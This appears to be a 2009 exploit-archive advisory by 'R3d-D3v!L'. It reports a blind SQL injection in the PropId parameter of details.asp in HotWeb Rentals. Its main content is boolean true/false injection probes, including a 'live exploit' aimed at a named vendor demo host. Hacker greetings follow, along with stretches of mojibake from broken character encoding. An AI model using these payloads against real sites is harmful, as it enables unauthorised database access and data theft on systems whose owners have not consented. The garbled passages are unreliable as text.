[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln
# Published : 2009-09-15
# Author : R3d-D3v!L
# Previous Title : Three Pillars Help Desk v3 (Auth Bypass) SQL Injection Vulnerability
# Next Title : efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability
[a?¢] a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢{?¨?3ù… ?§ù?ù?ù? ?§ù??±?-ù…ù? ?§ù??±?-ù?ù…}a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢
[a??]
[~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
[a??]
[~] Vendor: www.hotwebscripts.co.uk
[a??]
[a??] Software: HotWeb Rentals
[a??]
[a??] author: ((??3d D3v!L))
[a??]
[a??] Date: 15.2.2009
[a??]
[a??] Home: CL053D
[a??]
[a??] contact: X@hotmail.co.jp
[a??]a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??{DEV!L'5 of SYST3M}a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??
[a??] ERR0R CONSOLE
WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)
[a??]SECURE ALERT FR0M 7h3 R3d-D3V!L
[a??] Exploit:
[a??] TRU3 : details.asp?PropId=1+and+1=1
[a??] FALS3 : details.asp?PropId=1+and+1=2
[a??]liv3 3xpL0!T:
[a??] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[a??] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
[a??]
N073:
R34L R3d-D3V!L WAS h3R3 ((a??X@Minhal.co.ila??))
4R48!4N-HACK3R!!?§ù?ù??±?§?μù?ù? ?§ù??1?±?¨
[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & XP_10 & ?±ù??a ?′ù?ù? & ?§?¨ù? ?′ù??ˉ & B0rN 2 K!LL & JUPA &D3V!L-FUCK3R & ?§ù??2ù?ù??±ù?
[~]70 ù?ALL ARAB!AN HACKER 3X3PT:LAM3RZ
[~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y
[a??]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
[a??] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
[~]spechial FR!ND: 74M3M ?aù…ù?ù…
[~] !'M 4R48!4N 3XPL0!73R.
[~]
[~]--------------------------------------------------------------------------------
# www.Syue.com [2009-09-15]